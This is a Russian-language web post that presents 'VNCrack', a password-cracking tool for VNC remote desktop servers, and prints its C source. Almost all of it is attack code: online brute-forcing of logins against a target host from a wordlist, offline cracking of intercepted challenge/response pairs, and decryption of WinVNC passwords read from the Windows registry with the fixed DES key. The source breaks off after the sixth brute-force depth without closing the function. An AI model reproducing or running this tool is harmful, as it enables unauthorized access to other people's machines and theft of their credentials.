• Партнер

  • VNCrack - это, типа, взломщик для VNC. Утилита пытается определить логин/пароль путем перебора всех возможных комбинаций. Но при попытке поиметь VNC 3.3.3r7 и выше, тебя ждет встреча с розовой птицей обломинго 😉 (из-за счетчика авторизаций)

    Код Эксплоита:

    /* Project code: vncrack for windows (vnx4)

    *

    * FX <fx@phenoelit.de>

    * Phenoelit (http://www.phenoelit.de/)

    * (c) 2k

    *

    */

    #include <stdio.h>

    #include <string.h>

    #include <sys/types.h>

    #include <unistd.h>

    #include <winsock.h>

    #include "d3des.h"

    #include "vncauth.h"

    extern unsigned char fixedkey[8];

    #define SPLASH "VNCrackX4 - by Phenoelit (http://www.phenoelit.de/)\n"

    int verbose=0,lbf=0;

    char *schallange=NULL, *sresponse=NULL;

    void interactive(void);

    void cr_crack(char *wordlist);

    void *sec_malloc(size_t size) {

    void *p;

    if ((p=malloc(size))==NULL) {

    fprintf(stderr,"malloc() failed for %d bytes\n",size);

    exit (-1);

    }

    memset(p,0,size);

    return p;

    }

    void usage(void) {

    printf("VNCrackX4\n"

    "by Phenoelit (http://www.phenoelit.de/)\n\n"\

    "Usage:\n"

    "Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n"

    "Windows interactive mode: ./vncrack -W \n"

    "\tenter hex key one byte per line - find it in\n"

    "\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n"

    "\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n"

    "Options for online mode:\n"

    "-v\tverbose (repeat -v for more)\n"

    "-p P\tconnect to port P instead of 5900\n"

    "Options for PHoss intercepted challages:\n"

    "-c <challange>\tchallange from PHoss output\n"

    "-r <response>\tresponse from PHoss output\n"

    );

    exit(-1);

    }

    void sleep(DWORD ms) {

    DWORD t1;

    t1=GetTickCount();

    while (GetTickCount()<(t1+ms));

    }

    int main(int argc, char **argv) {

    int sfd; /* socket */

    unsigned long dest_ip;

    struct sockaddr_in dest_addr;

    char *rbuf;

    unsigned char atype[4];

    unsigned char challange[16];

    char *vnchost=NULL;

    u_short vncport=5900;

    int i,ani=0;

    char *wordlist=NULL;

    FILE *fd;

    char *tryword;

    char servertext[255];

    char *sthelp;

    int conwait=90;

    /* check the command line options */

    for (i=1;i<argc;i++) {

    switch (argv[i][1]) {

    case 'v': // verbose

    verbose++;

    break;

    case 'p':

    if (argv[++i]==NULL) usage();

    if ((vncport=atoi(argv[i]))==0) {

    fprintf(stderr,"wrong port number: %s\n",argv[i]);

    exit (-1);

    }

    break;

    case 'h':

    if (argv[++i]==NULL) usage();

    vnchost=(char *)sec_malloc(strlen(argv[i])+1);

    strcpy(vnchost,argv[i]);

    break;

    case 'w':

    if (argv[++i]==NULL) usage();

    wordlist=(char *)sec_malloc(strlen(argv[i])+1);

    strcpy(wordlist,argv[i]);

    break;

    case 'W':

    interactive();

    break;

    case 'c':

    if (argv[++i]==NULL) usage();

    schallange=(char *)sec_malloc(strlen(argv[i])+1);

    strcpy(schallange,argv[i]);

    break;

    case 'r':

    if (argv[++i]==NULL) usage();

    sresponse=(char *)sec_malloc(strlen(argv[i])+1);

    strcpy(sresponse,argv[i]);

    break;

    default:

    usage();

    }

    }

    if (schallange||sresponse) {

    printf(SPLASH);

    cr_crack(wordlist); /* exit is done here */

    }

    if (!(vnchost&&vncport&&wordlist)) usage();

    printf(SPLASH);

    /* host */

    dest_ip=inet_addr(vnchost);

    memcpy(&dest_addr.sin_addr,&dest_ip,sizeof(dest_ip));

    dest_addr.sin_port=htons(vncport);

    dest_addr.sin_family=AF_INET;

    /* make sure we can talk WinSock

    Comment: I like to enclose this, because it is SO UGLY */

    {

    WORD wVersionRequested;

    WSADATA wsaData;

    int err;

    wVersionRequested = MAKEWORD(1, 1);

    err = WSAStartup(wVersionRequested, &wsaData);

    if (err != 0) {

    fprintf(stderr,"Unable to start networking");

    exit (-1);

    }

    if ((sfd=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET) {

    fprintf(stderr,"Unable to get a socket");

    exit (-1);

    }

    } // socket obtained and GO

    if ((fd=fopen(wordlist,"rt"))==NULL) {

    fprintf(stderr,"Unable to open wordlist %s\n",wordlist);

    exit (-1);

    }

    tryword=sec_malloc(256);

    while (fgets(tryword,255,fd)!=NULL) {

    /* cut the word */

    if (strlen(tryword)>8) tryword[8]='\0';

    tryword[strlen(tryword)-1]='\0';

    if (verbose) {

    printf("\ntrying '%s' ...",tryword);

    fflush(stdout);

    }

    if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))!=0) {

    fprintf(stderr,"Connect failed.\n");

    exit(-1);

    }

    /* connunication starts with server->client version packet */

    rbuf=sec_malloc(100);

    if (recv(sfd,rbuf,100,0)<0) {

    fprintf(stderr,"recv()");

    exit(-1);

    }

    if (verbose>1) printf("\nServer Protocol version: %s",rbuf);

    /* bounce this message back - so the server will continue */

    if (send(sfd,rbuf,strlen(rbuf),0)<0) {

    fprintf(stderr,"send()");

    exit(-1);

    }

    if (recv(sfd,atype,sizeof(atype),0)<0) {

    fprintf(stderr,"recv()");

    exit(-1);

    }

    if (verbose>1) {

    printf("Authentication type: ");

    for (i=0;i<4;i++) { printf("%x ",atype[i]); }

    printf("\n");

    }

    switch (atype[3]) {

    case 0:

    fprintf(stderr,"Server told me: connection close\n");

    if (verbose) {

    // try to retrieve the reason

    memset(servertext,0,sizeof(servertext));

    if (recv(sfd,servertext,sizeof(servertext),0)<0) {

    fprintf(stderr,"recv() in verbose");

    exit(-1);

    } else {

    sthelp=servertext;

    sthelp+=4;

    fprintf(stderr,"Server says: %s\n",sthelp);

    }

    }

    exit(-1);

    break; /* not reached */

    case 1:

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Server does not require authentication!\n"

    ">>>>>>>>>>>>>>>\n");

    exit(-1);

    break; /* not reached */

    case 2:

    if (verbose>1)

    printf( "Authentication type 'VNC authentication' - fine\n");

    break;

    default:

    fprintf(stderr,"Unknown authentication requested by server\n");

    exit(-1);

    }

    if (recv(sfd,challange,sizeof(challange),0)<0) {

    fprintf(stderr,"recv()");

    exit(-1);

    }

    if (verbose>1) {

    printf("challange: ");

    for (i=0;i<16;i++) { printf("%x ",challange[i]); }

    printf("\n");

    }

    /* encrypt challange with password and send this fuck to the server */

    vncEncryptBytes(challange,tryword);

    if (send(sfd,challange,sizeof(challange),0)<0) {

    fprintf(stderr,"auth send()");

    exit(-1);

    }

    atype[3]=0;

    if (recv(sfd,atype,sizeof(atype),0)<0) {

    fprintf(stderr,"auth recv()");

    exit(-1);

    }

    switch (atype[3]) {

    case 0:

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",tryword);

    free(tryword);

    exit(0);

    break; /* not reached */

    case 1: /* 'normal' failed */

    if (verbose) printf("failed\n");

    break;

    case 2: /* too many */

    printf("Server is angry, waiting for calm down...\n");

    sleep(10000);

    break;

    default:

    fprintf(stderr,"Unknown response\n");

    exit(-1);

    }

    shutdown(sfd,2);

    closesocket(sfd);

    memset(tryword,0,256);

    }

    free(tryword);

    fclose(fd);

    return 0;

    }

    void interactive(void) {

    unsigned char *pass;

    int i;

    char c;

    pass=(char *)sec_malloc(9);

    for (i=0;i<8;i++) {

    scanf("%x",&c);

    pass[i]=c;

    }

    printf("Entered HEX String: ");

    for (i=0;i<8;i++) { printf("%x ",pass[i]); }

    printf("\n");

    deskey(fixedkey,DE1);

    des(pass,pass);

    printf("VNC Password: %s\n",pass);

    exit(0);

    }

    void cr_crack(char *wordlist) {

    int i,j;

    #define CRL 16

    char chl[CRL+1];

    char rsp[CRL+1];

    char tchl[CRL+1];

    char ts[3];

    FILE *fd;

    char *tryword;

    char bft[9];

    char cset1[] =

    "abcdefghijklmnopqrstuvwxyz"

    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

    "1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0";

    #define cset1_len (92)

    int cnt[8];

    time_t t1,t2;

    if (!wordlist) {

    fprintf(stderr,"Supply wordlist file !");

    exit(-1);

    }

    if ((!schallange)||(!sresponse)) {

    usage();

    }

    if (

    (strlen(schallange)!=16*2)

    ||(strlen(sresponse)!=16*2)

    ) {

    fprintf(stderr,

    "challange and response have to be 32 characters each\n");

    exit (-1);

    }

    memset(&chl,0,CRL+1);

    memset(&tchl,0,CRL+1);

    memset(&rsp,0,CRL+1);

    memset(&ts,0,3);

    j=0;

    for (i=0;i<CRL;i++) {

    strncpy(ts,&schallange[j],2);

    chl[i]=(unsigned char)strtol(ts,NULL,16);

    strncpy(ts,&sresponse[j],2);

    rsp[i]=(unsigned char)strtol(ts,NULL,16);

    j+=2;

    }

    if (verbose) {

    printf("Challange: ");

    for (i=0;i<CRL;i++) {

    printf("%x",(unsigned char) chl[i]);

    }

    printf("\n");

    printf("Response : ");

    for (i=0;i<CRL;i++) {

    printf("%x",(unsigned char) rsp[i]);

    }

    printf("\n");

    }

    if ((fd=fopen(wordlist,"rt"))==NULL) {

    fprintf(stderr,"Could not open wordlist\n");

    exit (-1);

    }

    tryword=sec_malloc(256);

    while (fgets(tryword,255,fd)!=NULL) {

    tryword[strlen(tryword)-1]='\0';

    /* try this word */

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,tryword);

    if (verbose>1) {

    for (i=0;i<CRL;i++) {

    printf("%x",(unsigned char) rsp[i]);

    }

    printf("\n");

    for (i=0;i<CRL;i++) {

    printf("%x",(unsigned char) tchl[i]);

    }

    printf("\n");

    }

    if (!memcmp(tchl,rsp,CRL)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",tryword);

    free(tryword);

    exit(0);

    } else {

    if (verbose) printf("%s failed\n",tryword);

    }

    memset(tryword,0,256);

    }

    fclose(fd);

    free(tryword);

    printf( "-----------------------------------\n"

    "Wordlist failed - going brute force\n"

    "-----------------------------------\n" );

    t1=GetTickCount();

    bft[8]='\0';

    bft[1]='\0';

    printf("\tdepth I\n");

    for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {

    bft[0]=cset1[cnt[0]];

    if (verbose)

    printf("try: %s\n",bft);

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,bft);

    if (!memcmp(tchl,rsp,16)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",

    bft);

    exit (0);

    }

    } // for 0

    bft[2]='\0';

    printf("\tdepth II\n");

    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {

    bft[1]=cset1[cnt[1]];

    for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {

    bft[0]=cset1[cnt[0]];

    if (verbose)

    printf("try: %s\n",bft);

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,bft);

    if (!memcmp(tchl,rsp,16)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",

    bft);

    exit (0);

    }

    } // for 0

    } // for 1

    /************/

    bft[3]='\0';

    printf("\tdepth III\n");

    for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {

    bft[2]=cset1[cnt[2]];

    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {

    bft[1]=cset1[cnt[1]];

    for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {

    bft[0]=cset1[cnt[0]];

    if (verbose)

    printf("try: %s\n",bft);

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,bft);

    if (!memcmp(tchl,rsp,16)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",

    bft);

    exit (0);

    }

    } // for 0

    } // for 1

    } //2

    /************/

    bft[4]='\0';

    printf("\tdepth IV\n");

    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {

    bft[3]=cset1[cnt[3]];

    for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {

    bft[2]=cset1[cnt[2]];

    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {

    bft[1]=cset1[cnt[1]];

    for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {

    bft[0]=cset1[cnt[0]];

    if (verbose)

    printf("try: %s\n",bft);

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,bft);

    if (!memcmp(tchl,rsp,16)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",

    bft);

    exit (0);

    }

    } // for 0

    } // for 1

    } //2

    } //3

    /************/

    bft[5]='\0';

    printf("\tdepth V\n");

    for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) {

    bft[4]=cset1[cnt[4]];

    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {

    bft[3]=cset1[cnt[3]];

    for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {

    bft[2]=cset1[cnt[2]];

    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {

    bft[1]=cset1[cnt[1]];

    for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {

    bft[0]=cset1[cnt[0]];

    if (verbose)

    printf("try: %s\n",bft);

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,bft);

    if (!memcmp(tchl,rsp,16)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",

    bft);

    exit (0);

    }

    } // for 0

    } // for 1

    } //2

    } //3

    } //4

    /************/

    bft[6]='\0';

    printf("\tdepth VI\n");

    for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) {

    bft[5]=cset1[cnt[5]];

    for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) {

    bft[4]=cset1[cnt[4]];

    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {

    bft[3]=cset1[cnt[3]];

    for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {

    bft[2]=cset1[cnt[2]];

    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {

    bft[1]=cset1[cnt[1]];

    for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {

    bft[0]=cset1[cnt[0]];

    if (verbose)

    printf("try: %s\n",bft);

    memcpy(tchl,chl,CRL);

    vncEncryptBytes(tchl,bft);

    if (!memcmp(tchl,rsp,16)) {

    printf( "\n>>>>>>>>>>>>>>>\n"

    "Password: %s\n"

    ">>>>>>>>>>>>>>>\n",

    bft);

    exit (0);

    }

    } // for 0

    } // for 1

    } //2

    } //3

    } //4

    } //

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии